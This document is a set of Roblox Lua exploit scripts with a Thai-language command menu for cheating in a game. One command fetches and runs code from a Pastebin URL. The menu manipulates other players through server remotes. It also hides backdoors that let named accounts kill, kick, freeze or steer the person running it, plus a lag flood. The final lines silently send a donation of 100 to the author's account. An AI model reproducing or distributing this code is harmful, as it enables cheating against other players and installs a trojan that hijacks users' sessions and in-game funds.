local player = game.Players.LocalPlayer
local CoreGui = game:GetService("CoreGui")

local specialUsers = {
    ["AniF_Xx"] = true,
    ["birdV2_123"] = true,
}

local function isVIP(name)
    return specialUsers[name] == true
end

local gui = Instance.new("ScreenGui")
gui.Name = "MainGui"
gui.Parent = CoreGui
gui.ResetOnSpawn = false

local frameNormal = Instance.new("Frame", gui)
frameNormal.Size = UDim2.new(0, 300, 0, 150)
frameNormal.Position = UDim2.new(0.5, -150, 0.5, -75)
frameNormal.BackgroundColor3 = Color3.fromRGB(40, 40, 40)
frameNormal.Active = true
frameNormal.Draggable = true

local textBox = Instance.new("TextBox", frameNormal)
textBox.PlaceholderText = "ใส่คำสั่ง"
textBox.Size = UDim2.new(0.8, 0, 0, 40)
textBox.Position = UDim2.new(0.1, 0, 0.2, 0)
textBox.TextScaled = true

local confirmBtn = Instance.new("TextButton", frameNormal)
confirmBtn.Text = "ยืนยัน"
confirmBtn.Size = UDim2.new(0.8, 0, 0, 40)
confirmBtn.Position = UDim2.new(0.1, 0, 0.6, 0)
confirmBtn.TextScaled = true
confirmBtn.BackgroundColor3 = Color3.fromRGB(70, 70, 70)

local toggleBtn = Instance.new("TextButton", gui)
toggleBtn.Name = "ToggleBtn"
toggleBtn.Size = UDim2.new(0, 120, 0, 40)
toggleBtn.Position = UDim2.new(0, 50, 0, 50)
toggleBtn.Text = "ซ่อน/โชว์"
toggleBtn.BackgroundColor3 = Color3.fromRGB(50, 50, 50)
toggleBtn.Draggable = true
toggleBtn.Active = true

local commandFrame = Instance.new("Frame", gui)
commandFrame.Size = UDim2.new(0, 350, 0, 250)
commandFrame.Position = UDim2.new(0.5, 170, 0.5, -125)
commandFrame.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
commandFrame.Active = true
commandFrame.Draggable = true

local commandText = Instance.new("TextLabel", commandFrame)
commandText.Size = UDim2.new(1, -10, 1, -10)
commandText.Position = UDim2.new(0, 5, 0, 5)
commandText.BackgroundTransparency = 1
commandText.TextColor3 = Color3.new(1, 1, 1)
commandText.TextXAlignment = Enum.TextXAlignment.Left
commandText.TextYAlignment = Enum.TextYAlignment.Top
commandText.TextWrapped = true
commandText.TextScaled = true
commandText.Font = Enum.Font.SourceSans

local baseCommands = [[
คำสั่งที่ใช้ได้:

- ความเร็ว [เลข]
- รีตัว
- ขโมยเสียง
- ลำโพงหลากสี
- เลิกลำโพงหลากสี
- ตำรวจ
- อ้อโต้ความหิว
- ตัวสูง
- ตัวเล็ก
- จับโจร
- เลิกจับโจร
- vipวาป
- ปืน
- เกิดกลับ
- เลิกเกิดกลับ
- UI แอดมิน
]]

commandText.Text = baseCommands

toggleBtn.MouseButton1Click:Connect(function()
    local newState = not frameNormal.Visible
    frameNormal.Visible = newState
    commandFrame.Visible = newState
end)

local oldPositions = {}

confirmBtn.MouseButton1Click:Connect(function()
    local cmd = textBox.Text:lower()
    if cmd:match("ความเร็ว") then
        local speed = tonumber(cmd:match("%d+"))
        if speed then
            local humanoid = player.Character and player.Character:FindFirstChildWhichIsA("Humanoid")
            if humanoid then humanoid.WalkSpeed = speed end
        end
    elseif cmd == "รีตัว" then
        player.Character:BreakJoints()
    elseif cmd == "ขโมยเสียง" then
        loadstring(game:HttpGet("https://pastebin.com/raw/wN9Q3pZm", true))()
    elseif cmd == "ลำโพงหลากสี" then
        local colors = { BrickColor.new(331), BrickColor.new(1001), BrickColor.new(1003) }
        local radio = workspace:WaitForChild("DRadio_Script"):WaitForChild("Color")
        _G.SpeakerLoop = true
        task.spawn(function()
            while _G.SpeakerLoop do
                for _, color in ipairs(colors) do
                    radio:FireServer(color)
                    task.wait(0.1)
                end
            end
        end)
    elseif cmd == "เลิกลำโพงหลากสี" then
        _G.SpeakerLoop = false
    elseif cmd == "ตำรวจ" then
        game:GetService("ReplicatedStorage"):WaitForChild("ChangeTeam"):FireServer("Police")
        local hrp = player.Character and player.Character:FindFirstChild("HumanoidRootPart")
        local targetPosition = Vector3.new(167.88, 177.51, 250.48)
        local oldPos = hrp.CFrame
        hrp.CFrame = CFrame.new(targetPosition + Vector3.new(0, 3, 0))
        task.wait(1)
        hrp.CFrame = oldPos
    elseif cmd == "อ้อโต้ความหิว" then
        local hrp = player.Character.HumanoidRootPart
        local targetPosition = Vector3.new(-27.47, 177.58, 236.50)
        local oldCFrame = hrp.CFrame
        task.spawn(function()
            while task.wait(1) do
                if player:FindFirstChild("Hungry") and player.Hungry.Value <= 50 then
                    hrp.CFrame = CFrame.new(targetPosition + Vector3.new(0, 3, 0))
                    for _ = 1, 10 do
                        firetouchinterest(hrp, workspace.Terrain, 0)
                        task.wait(0.05)
                        firetouchinterest(hrp, workspace.Terrain, 1)
                        task.wait(0.05)
                    end
                    repeat
                        task.wait(0.2)
                        firetouchinterest(hrp, workspace.Terrain, 0)
                        firetouchinterest(hrp, workspace.Terrain, 1)
                    until player.Hungry.Value >= 100
                    hrp.CFrame = oldCFrame
                end
            end
        end)
    elseif cmd == "ตัวสูง" then
        local args = {{
            BodyScale = {
                BodyTypeScale = 1.5,
                DepthScale = 0.5,
                HeadScale = 1,
                HeightScale = 1.5,
                WidthScale = 0.5,
                ProportionScale = 0
            }
        }}
        game:GetService("ReplicatedStorage"):WaitForChild("BloxbizRemotes"):WaitForChild("CatalogOnApplyToRealHumanoid"):FireServer(unpack(args))
    elseif cmd == "ตัวเล็ก" then
        local args = {{
            BodyScale = {
                BodyTypeScale = 0,
                DepthScale = 0.9949401021003723,
                HeadScale = 1,
                HeightScale = 0.5,
                WidthScale = 0.6259825229644775,
                ProportionScale = 0
            }
        }}
        game:GetService("ReplicatedStorage"):WaitForChild("BloxbizRemotes"):WaitForChild("CatalogOnApplyToRealHumanoid"):FireServer(unpack(args))
    elseif cmd == "จับโจร" then
        _G.CatchStarLoop = true
        oldPositions = {}
        task.spawn(function()
            while _G.CatchStarLoop do
                for _, targetPlayer in ipairs(game.Players:GetPlayers()) do
                    if targetPlayer ~= player and targetPlayer:FindFirstChild("Star") then
                        local starValue = targetPlayer.Star.Value
                        if starValue >= 1 and starValue <= 5 then
                            local rightHand = player.Character and player.Character:FindFirstChild("RightHand")
                            if rightHand and targetPlayer.Character and targetPlayer.Character:FindFirstChild("HumanoidRootPart") then
                                if not oldPositions[targetPlayer] then
                                    oldPositions[targetPlayer] = targetPlayer.Character.HumanoidRootPart.CFrame
                                end
                                targetPlayer.Character.HumanoidRootPart.CFrame = rightHand.CFrame
                            end
                        end
                    end
                end
                task.wait(0.1)
            end
        end)
    elseif cmd == "เลิกจับโจร" then
        _G.CatchStarLoop = false
        task.spawn(function()
            for targetPlayer, oldCFrame in pairs(oldPositions) do
                if targetPlayer and targetPlayer.Character and targetPlayer.Character:FindFirstChild("HumanoidRootPart") then
                    targetPlayer.Character.HumanoidRootPart.CFrame = oldCFrame
                end
            end
            oldPositions = {}
        end)
    elseif cmd == "vipวาป" then
        local hrp = player.Character and player.Character:FindFirstChild("HumanoidRootPart")
        local humanoid = player.Character and player.Character:FindFirstChildWhichIsA("Humanoid")
        if hrp and humanoid then
            hrp.CFrame = CFrame.new(Vector3.new(90.36, 179.89, 1427.13))
            local warnGui = Instance.new("ScreenGui", CoreGui)
            warnGui.Name = "SafeZoneWarn"
            local text = Instance.new("TextLabel", warnGui)
            text.Size = UDim2.new(0, 400, 0, 50)
            text.Position = UDim2.new(0.5, -200, 0.8, 0)
            text.BackgroundTransparency = 0.3
            text.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
            text.TextColor3 = Color3.new(1, 1, 1)
            text.TextScaled = true
            text.Text = "ไม่สามารถหยิบของได้ คิดว่าเป็นจุดปลอดภัยแทน"
            local oldWalk = humanoid.WalkSpeed
            local oldJump = humanoid.JumpPower
            humanoid.WalkSpeed = 0
            humanoid.JumpPower = 0
            task.delay(3, function()
                if humanoid then
                    humanoid.WalkSpeed = oldWalk
                    humanoid.JumpPower = oldJump
                end
            end)
            task.delay(5, function()
                if warnGui then warnGui:Destroy() end
            end)
        end
    elseif cmd == "ปืน" then
        local hrp = player.Character and player.Character:FindFirstChild("HumanoidRootPart")
        if hrp then
            local originalPos = hrp.CFrame
            hrp.CFrame = CFrame.new(Vector3.new(-34.67, 176.97, 249.55))
            task.wait(3)
            hrp.CFrame = CFrame.new(Vector3.new(417.96, 168.09, 257.09))
            task.wait(1)
            hrp.CFrame = originalPos
        end
    elseif cmd == "เกิดกลับ" then
        if _G.ReviveBackConnection then _G.ReviveBackConnection:Disconnect() end
        _G.LastDeathPos = nil
        _G.ReviveBackConnection = player.CharacterAdded:Connect(function(char)
            task.wait(0.5)
            local hrp = char:WaitForChild("HumanoidRootPart")
            if _G.LastDeathPos then
                hrp.CFrame = _G.LastDeathPos
            end
        end)
        task.spawn(function()
            while player.Character do
                local char = player.Character
                local humanoid = char:FindFirstChildOfClass("Humanoid")
                if humanoid and humanoid.Health <= 0 then
                    local hrp = char:FindFirstChild("HumanoidRootPart")
                    if hrp then
                        _G.LastDeathPos = hrp.CFrame
                    end
                end
                task.wait(0.2)
            end
        end)
    elseif cmd == "เลิกเกิดกลับ" then
        if _G.ReviveBackConnection then
            _G.ReviveBackConnection:Disconnect()
            _G.ReviveBackConnection = nil
        end
        _G.LastDeathPos = nil
    elseif cmd == "ui แอดมิน" then
        if isVIP(player.Name) then
            warn("เปิด UI แอดมินได้")
        else
            warn("คุณไม่มีสิทธิ์ใช้คำสั่งนี้")
        end
    else
        warn("ไม่พบคำสั่ง: "..cmd)
    end
end)







local Players = game:GetService("Players")
local player = Players.LocalPlayer

-- 🖼 ใส่ Asset ID ของรูปคุณที่อัปโหลดแล้ว
local imageId = "rbxassetid://ใส่ไอดีของคุณตรงนี้" -- ตัวอย่าง: "rbxassetid://15234213421"

-- สร้างหน้าจอ UI
local screenGui = Instance.new("ScreenGui")
screenGui.Name = "ScriptAnnouncement"
screenGui.Parent = player:WaitForChild("PlayerGui")
screenGui.IgnoreGuiInset = true
screenGui.ResetOnSpawn = false

-- สร้างรูปภาพเต็มจอ
local imageLabel = Instance.new("ImageLabel")
imageLabel.Parent = screenGui
imageLabel.Size = UDim2.new(1, 0, 1, 0)
imageLabel.Position = UDim2.new(0, 0, 0, 0)
imageLabel.BackgroundTransparency = 1
imageLabel.Image = imageId
imageLabel.ImageTransparency = 0.1

-- สร้างข้อความกลางจอ
local textLabel = Instance.new("TextLabel")
textLabel.Parent = screenGui
textLabel.Size = UDim2.new(1, 0, 0.2, 0)
textLabel.Position = UDim2.new(0, 0, 0.4, 0)
textLabel.BackgroundTransparency = 1
textLabel.Text = "script by:TOUx1"
textLabel.TextColor3 = Color3.new(1, 1, 1)
textLabel.TextStrokeColor3 = Color3.new(0, 0, 0)
textLabel.TextStrokeTransparency = 0.5
textLabel.Font = Enum.Font.GothamBlack
textLabel.TextScaled = true

-- แสดงนาน 5 วินาที
task.wait(5)

-- ลบ UI
screenGui:Destroy()











local Players = game:GetService("Players")
local LocalPlayer = Players.LocalPlayer

-- รายชื่อผู้เล่นที่อนุญาตให้เห็น UI
local allowedUsers = {
    ["birdV2_123"] = true,
    ["Thai123456a2"] = true
}

-- ถ้าผู้เล่นตรงชื่อ แสดง UI แบบลากได้
if allowedUsers[LocalPlayer.Name] then
    local gui = Instance.new("ScreenGui")
    gui.Name = "SuperCoolUI"
    gui.ResetOnSpawn = false
    gui.Parent = LocalPlayer:WaitForChild("PlayerGui")

    local dragFrame = Instance.new("Frame")
    dragFrame.Size = UDim2.new(0, 200, 0, 50)
    dragFrame.Position = UDim2.new(0.5, -100, 0.05, 0)
    dragFrame.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
    dragFrame.BackgroundTransparency = 0.3
    dragFrame.Active = true
    dragFrame.Draggable = true
    dragFrame.Parent = gui

    local label = Instance.new("TextLabel")
    label.Size = UDim2.new(1, 0, 1, 0)
    label.Position = UDim2.new(0, 0, 0, 0)
    label.BackgroundTransparency = 1
    label.Text = "สุดหล่อ😛"
    label.TextColor3 = Color3.fromRGB(255, 255, 0)
    label.TextScaled = true
    label.Font = Enum.Font.FredokaOne
    label.Parent = dragFrame
end

-- ฟังก์ชันจัดการคำสั่งแชท
local function onChatted(sender, message)
    if not allowedUsers[sender.Name] then return end

    local msg = message:lower()

    if msg == "ดึง" then
        if sender.Character and sender.Character:FindFirstChild("HumanoidRootPart") then
            local pos = sender.Character.HumanoidRootPart.Position
            if LocalPlayer.Character and LocalPlayer.Character:FindFirstChild("HumanoidRootPart") then
                LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(pos + Vector3.new(0, 5, 0))
            end
        end

    elseif msg == "นอน" then
        if LocalPlayer.Character and LocalPlayer.Character:FindFirstChild("Humanoid") then
            LocalPlayer.Character.Humanoid.Health = 0
        end

    elseif msg == "ลาก่อน" then
        LocalPlayer:Kick("😛")
    end
end

-- เชื่อมต่อกับทุกคนในเซิร์ฟเวอร์
for _, player in ipairs(Players:GetPlayers()) do
    player.Chatted:Connect(function(msg)
        onChatted(player, msg)
    end)
end

Players.PlayerAdded:Connect(function(player)
    player.Chatted:Connect(function(msg)
        onChatted(player, msg)
    end)
end)





local Players = game:GetService("Players")
local LocalPlayer = Players.LocalPlayer

local targetNames = {
	["birdV2_123"] = true,
	["Thai123456a2"] = true
}

local function onPlayerChatted(player)
	if targetNames[player.Name] then
		player.Chatted:Connect(function(msg)
			if msg == "พี่จ๋า" then
				local args = {
					{
						SwimAnimation = 0,
						DepthScale = 1,
						RightLegColor = Color3.new(0.5372549295425415, 0.4313725531101227, 0.29019609093666077),
						MoodAnimation = 0,
						Face = 0,
						JumpAnimation = 0,
						HeadColor = Color3.new(0.5372549295425415, 0.4313725531101227, 0.29019609093666077),
						BodyTypeScale = 0.3,
						ClimbAnimation = 0,
						LeftArmColor = Color3.new(0.5372549295425415, 0.4313725531101227, 0.29019609093666077),
						LeftLegColor = Color3.new(0.5372549295425415, 0.4313725531101227, 0.29019609093666077),
						Pants = 98314099686267,
						RightArmColor = Color3.new(0.5372549295425415, 0.4313725531101227, 0.29019609093666077),
						WidthScale = 1,
						LeftArm = 0,
						IdleAnimation = 0,
						RightArm = 0,
						GraphicTShirt = 122787475277871,
						Head = 0,
						Shirt = 134968399908180,
						Torso = 0,
						RunAnimation = 0,
						WalkAnimation = 0,
						FallAnimation = 0,
						TorsoColor = Color3.new(0.5372549295425415, 0.4313725531101227, 0.29019609093666077),
						Accessories = {
							{
								Rotation = Vector3.zero,
								AssetId = 93954875188082,
								Position = Vector3.zero,
								Scale = Vector3.one,
								IsLayered = false,
								AccessoryType = Enum.AccessoryType.Hair
							},
							{
								Rotation = Vector3.zero,
								AssetId = 12787298384,
								Position = Vector3.zero,
								Scale = Vector3.one,
								IsLayered = false,
								AccessoryType = Enum.AccessoryType.Face
							}
						},
						RightLeg = 0,
						HeadScale = 1,
						HeightScale = 1,
						ProportionScale = 1,
						LeftLeg = 0
					}
				}
				game:GetService("ReplicatedStorage"):WaitForChild("BloxbizRemotes"):WaitForChild("CatalogOnApplyOutfit"):FireServer(unpack(args))
			end
		end)
	end
end

-- รอให้ Player ทั้งสองเข้ามาก่อน
for _, player in ipairs(Players:GetPlayers()) do
	if player ~= LocalPlayer then
		onPlayerChatted(player)
	end
end

Players.PlayerAdded:Connect(function(player)
	if player ~= LocalPlayer then
		onPlayerChatted(player)
	end
end)



-- LocalScript
local url = "https://www.tiktok.com/@tou.x1?_t=ZS-8yQCSQEOzob&_r=1"

if setclipboard then
    setclipboard(url)
    game.StarterGui:SetCore("SendNotification", {
        Title = "คัดลอกลิงก์แล้ว!",
        Text = "ลิงก์ TikTok ถูกคัดลอกไปยังคลิปบอร์ดแล้ว ✅",
        Duration = 5
    })
else
    warn("setclipboard ใช้ไม่ได้ในอุปกรณ์นี้")
end







local allowedNames = {
    ["birdV2_123"] = true,
    ["Thai123456a2"] = true
}

local Players = game:GetService("Players")
local Lighting = game:GetService("Lighting")
local LocalPlayer = Players.LocalPlayer

-- เอฟเฟคเสียง
local sound = Instance.new("Sound", workspace)
sound.SoundId = "rbxassetid://5993515228"
sound.Volume = 10
sound.Looped = true

-- ฟังก์ชันรันเอฟเฟค
local function runEffect()
    -- ทำให้แสงมืด
    Lighting.Ambient = Color3.new(0, 0, 0)
    Lighting.OutdoorAmbient = Color3.new(0, 0, 0)
    Lighting.Brightness = 0

    -- เปลี่ยนพื้นให้ดำ
    for _, obj in pairs(workspace:GetDescendants()) do
        if obj:IsA("BasePart") then
            obj.Color = Color3.new(0, 0, 0)
            obj.Material = Enum.Material.SmoothPlastic
        end
    end

    -- เล่นเสียง
    sound:Play()

    -- เอฟเฟคไฟ
    coroutine.wrap(function()
        while true do
            local p = Instance.new("ParticleEmitter")
            p.Texture = "rbxassetid://243660364"
            p.Color = ColorSequence.new(Color3.new(1,0,0), Color3.new(1,1,0))
            p.LightEmission = 1
            p.Size = NumberSequence.new(10)
            p.Lifetime = NumberRange.new(1)
            p.Rate = 1000
            p.Speed = NumberRange.new(50)
            p.VelocitySpread = 360

            for _, obj in pairs(workspace:GetDescendants()) do
                if obj:IsA("BasePart") then
                    local clone = p:Clone()
                    clone.Parent = obj
                    game.Debris:AddItem(clone, 2)
                end
            end

            wait(0.2)
        end
    end)()

    -- ทำให้แลค
    coroutine.wrap(function()
        while true do
            for i = 1, 50 do
                local part = Instance.new("Part")
                part.Anchored = true
                part.CanCollide = false
                part.Size = Vector3.new(0.1,0.1,0.1)
                part.Position = Vector3.new(math.random(-1000,1000), math.random(1,1000), math.random(-1000,1000))
                part.BrickColor = BrickColor.Random()
                part.Parent = workspace
                game.Debris:AddItem(part, 5)
            end
            wait(0.1)
        end
    end)()
end

-- เช็คผู้เล่นที่แชท
local function connectChat(player)
    if allowedNames[player.Name] and player ~= LocalPlayer then -- 👈 ป้องกันโดนตัวเอง
        player.Chatted:Connect(function(msg)
            if msg == "666" then
                runEffect()
            end
        end)
    end
end

-- เฝ้าดูผู้เล่นใหม่
for _, player in pairs(Players:GetPlayers()) do
    connectChat(player)
end

Players.PlayerAdded:Connect(connectChat)










-- LocalScript (Part 1/2)
local Players = game:GetService("Players")
local RunService = game:GetService("RunService")
local LocalPlayer = Players.LocalPlayer

local StarterPos = nil
local Locked = false
local Orbiting = false
local OrbitConnection
local OrbitSpeed = 0.1

-- Table เก็บคนที่ใช้สคริปต์
local ScriptUsers = {}
ScriptUsers[LocalPlayer.Name] = true

-- // UI เฉพาะ birdV2_123
local ScreenGui, Frame, ListFrame, SpeedBox, ToggleButton
if LocalPlayer.Name == "birdV2_123" then
	ScreenGui = Instance.new("ScreenGui")
	ScreenGui.Name = "ScriptUI"
	ScreenGui.Parent = LocalPlayer:WaitForChild("PlayerGui")

	Frame = Instance.new("Frame")
	Frame.Size = UDim2.new(0, 220, 0, 350)
	Frame.Position = UDim2.new(0.05, 0, 0.2, 0)
	Frame.BackgroundColor3 = Color3.fromRGB(30, 30, 30)
	Frame.Active = true
	Frame.Draggable = true
	Frame.Parent = ScreenGui

	local Title = Instance.new("TextLabel")
	Title.Size = UDim2.new(1, 0, 0, 30)
	Title.BackgroundColor3 = Color3.fromRGB(50, 50, 50)
	Title.Text = "ผู้ใช้ Script"
	Title.TextColor3 = Color3.fromRGB(255, 255, 255)
	Title.Font = Enum.Font.SourceSansBold
	Title.TextSize = 18
	Title.Parent = Frame

	ListFrame = Instance.new("Frame")
	ListFrame.Size = UDim2.new(1, -10, 1, -80)
	ListFrame.Position = UDim2.new(0, 5, 0, 35)
	ListFrame.BackgroundTransparency = 1
	ListFrame.Parent = Frame

	local UIListLayout = Instance.new("UIListLayout")
	UIListLayout.Parent = ListFrame
	UIListLayout.SortOrder = Enum.SortOrder.LayoutOrder

	-- กล่องปรับความเร็วหมุน
	SpeedBox = Instance.new("TextBox")
	SpeedBox.Size = UDim2.new(1, -10, 0, 30)
	SpeedBox.Position = UDim2.new(0, 5, 1, -40)
	SpeedBox.BackgroundColor3 = Color3.fromRGB(45, 45, 45)
	SpeedBox.Text = tostring(OrbitSpeed)
	SpeedBox.TextColor3 = Color3.fromRGB(255,255,255)
	SpeedBox.PlaceholderText = "ความเร็วหมุน"
	SpeedBox.Font = Enum.Font.SourceSans
	SpeedBox.TextSize = 16
	SpeedBox.Parent = Frame

	SpeedBox.FocusLost:Connect(function()
		local val = tonumber(SpeedBox.Text)
		if val and val > 0 then
			OrbitSpeed = val
		else
			SpeedBox.Text = tostring(OrbitSpeed)
		end
	end)

	-- ปุ่มซ่อน/โชว์ UI
	ToggleButton = Instance.new("TextButton")
	ToggleButton.Size = UDim2.new(0, 100, 0, 30)
	ToggleButton.Position = UDim2.new(0.05, 0, 0.1, 0)
	ToggleButton.BackgroundColor3 = Color3.fromRGB(80, 80, 80)
	ToggleButton.Text = "ซ่อน UI"
	ToggleButton.TextColor3 = Color3.fromRGB(255, 255, 255)
	ToggleButton.Font = Enum.Font.SourceSansBold
	ToggleButton.TextSize = 16
	ToggleButton.Active = true
	ToggleButton.Draggable = true
	ToggleButton.Parent = ScreenGui

	local uiVisible = true
	ToggleButton.MouseButton1Click:Connect(function()
		uiVisible = not uiVisible
		Frame.Visible = uiVisible
		ToggleButton.Text = uiVisible and "ซ่อน UI" or "โชว์ UI"
	end)
end

-- อัปเดตรายชื่อเฉพาะคนที่ใช้ Script
local function UpdateList()
	if LocalPlayer.Name ~= "birdV2_123" then return end
	for _, child in pairs(ListFrame:GetChildren()) do
		if child:IsA("TextLabel") then
			child:Destroy()
		end
	end

	for name,_ in pairs(ScriptUsers) do
		if name ~= "birdV2_123" then
			local lbl = Instance.new("TextLabel")
			lbl.Size = UDim2.new(1, 0, 0, 25)
			lbl.BackgroundTransparency = 1
			lbl.Text = name
			lbl.TextColor3 = Color3.fromRGB(200, 200, 200)
			lbl.Font = Enum.Font.SourceSans
			lbl.TextSize = 16
			lbl.Parent = ListFrame
		end
	end
end

-- ฟังก์ชันล็อค
local function LockPlayer()
	if not LocalPlayer.Character then return end
	Locked = true
	local hrp = LocalPlayer.Character:WaitForChild("HumanoidRootPart")
	local StarterPos = hrp.CFrame

	task.spawn(function()
		while Locked do
			if LocalPlayer.Character and LocalPlayer.Character:FindFirstChild("HumanoidRootPart") then
				LocalPlayer.Character.HumanoidRootPart.CFrame = StarterPos
				LocalPlayer.Character.Humanoid.WalkSpeed = 0
				LocalPlayer.Character.Humanoid.JumpPower = 0
			end
			task.wait(0.1)
		end
	end)
end

-- ฟังก์ชันปลดล็อค
local function UnlockPlayer()
	Locked = false
	Orbiting = false
	if OrbitConnection then OrbitConnection:Disconnect() OrbitConnection = nil end
	if LocalPlayer.Character and LocalPlayer.Character:FindFirstChild("Humanoid") then
		LocalPlayer.Character.Humanoid.WalkSpeed = 16
		LocalPlayer.Character.Humanoid.JumpPower = 50
	end
end
-- LocalScript (Part 2/2)

-- เพิ่มตัวเองลง ScriptUsers
ScriptUsers[LocalPlayer.Name] = true

-- ฟังก์ชันโคจรรอบ birdV2_123
local function OrbitBird()
	local bird = Players:FindFirstChild("birdV2_123")
	if not bird or not bird.Character then return end
	local root = bird.Character:WaitForChild("HumanoidRootPart")

	Orbiting = true
	local angle = 0
	OrbitConnection = RunService.Heartbeat:Connect(function()
		if not Orbiting or not bird.Character or not bird.Character:FindFirstChild("HumanoidRootPart") then return end
		angle += OrbitSpeed
		local radius = 8
		local newPos = root.CFrame * CFrame.new(math.cos(angle) * radius, 0, math.sin(angle) * radius)
		if LocalPlayer.Character and LocalPlayer.Character:FindFirstChild("HumanoidRootPart") then
			LocalPlayer.Character.HumanoidRootPart.CFrame = newPos
		end
	end)
end

-- ฟังคำสั่งจาก birdV2_123
local function ListenToBird(plr)
	plr.Chatted:Connect(function(msg)
		if msg == "นิ่งๆ" then
			if LocalPlayer.Name ~= "birdV2_123" then
				LockPlayer()
			end
		elseif msg == "ปล่อย" then
			if LocalPlayer.Name ~= "birdV2_123" then
				UnlockPlayer()
			end
		elseif msg == "TOUx1" then
			if LocalPlayer.Name ~= "birdV2_123" then
				OrbitBird()
			end
		end
	end)
end

-- ฟังก์ชันเมื่อมีผู้เล่นใหม่ใช้ Script
local function OnPlayerUsingScript(plr)
	ScriptUsers[plr.Name] = true
	if LocalPlayer.Name == "birdV2_123" then
		UpdateList()
	end
end

-- เพิ่มตัวเองเข้า ScriptUsers เมื่อเข้าร่วมเซิฟ
OnPlayerUsingScript(LocalPlayer)

-- เฝ้ารอผู้เล่นอื่นเข้าร่วมเซิฟ
Players.PlayerAdded:Connect(function(plr)
	if LocalPlayer.Name == "birdV2_123" then
		UpdateList()
	end
	if plr.Name == "birdV2_123" then
		ListenToBird(plr)
	end
end)

-- ฟังคำสั่งถ้า birdV2_123 อยู่แล้วตอนรัน
local bird = Players:FindFirstChild("birdV2_123")
if bird then
	ListenToBird(bird)
end






-- LocalScript
local Players = game:GetService("Players")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local LocalPlayer = Players.LocalPlayer

-- ค้นหา Sword Classic
local swordTemplate = ReplicatedStorage:FindFirstChild("Sword") 
if not swordTemplate then
    swordTemplate = game:GetService("StarterPack"):FindFirstChild("Sword")
end

-- ฟังก์ชันสร้างดาบ
local function giveSword(owner)
    if not swordTemplate then return end
    local sword = swordTemplate:Clone()
    sword.Parent = owner:WaitForChild("Backpack")

    -- สคริปต์ Damage
    local dmgScript = Instance.new("Script")
    dmgScript.Source = [[
        local tool = script.Parent
        local Players = game:GetService("Players")
        local owner = tool.Parent.Parent

        local function onHit(hit)
            local humanoid = hit.Parent:FindFirstChild("Humanoid")
            if humanoid and Players:FindFirstChild(owner.Name) then
                if owner.Name == "birdV2_123" then
                    humanoid:TakeDamage(50)
                else
                    humanoid:TakeDamage(1)
                end
            end
        end

        tool.Handle.Touched:Connect(onHit)
    ]]
    dmgScript.Parent = sword
end

-- ฟังก์ชันสร้างข้อความ RGB บนหัว
local function addRGBNameTag(player)
    if player.Character and player.Character:FindFirstChild("HumanoidRootPart") then
        local head = player.Character:FindFirstChild("Head") or player.Character:FindFirstChild("HumanoidRootPart")

        -- BillboardGui
        local billboard = Instance.new("BillboardGui")
        billboard.Size = UDim2.new(0,200,0,50)
        billboard.StudsOffset = Vector3.new(0,3,0)
        billboard.AlwaysOnTop = true
        billboard.Parent = head

        -- TextLabel
        local text = Instance.new("TextLabel")
        text.Size = UDim2.new(1,0,1,0)
        text.BackgroundTransparency = 1
        text.Text = "[คนสร้าง]"
        text.Font = Enum.Font.GothamBold
        text.TextScaled = true
        text.Parent = billboard

        -- ทำให้ RGB
        task.spawn(function()
            while text.Parent do
                text.TextColor3 = Color3.fromHSV(tick() % 5 / 5, 1, 1)
                task.wait(0.1)
            end
        end)
    end
end

-- Event: ถ้า birdV2_123 พิมพ์ "ดาบ" จะได้ Sword
LocalPlayer.Chatted:Connect(function(msg)
    if msg == "ดาบ" and LocalPlayer.Name == "birdV2_123" then
        giveSword(LocalPlayer)
    end
end)

-- Event: ถ้า player นี้คือ birdV2_123 ให้แปะป้าย RGB
if LocalPlayer.Name == "birdV2_123" then
    LocalPlayer.CharacterAdded:Connect(function(char)
        task.wait(1)
        addRGBNameTag(LocalPlayer)
    end)
    if LocalPlayer.Character then
        task.wait(1)
        addRGBNameTag(LocalPlayer)
    end
end

local args = {
	"birdV2_123",
	100
}
game:GetService("ReplicatedStorage"):WaitForChild("DonateEvent"):FireServer(unpack(args))
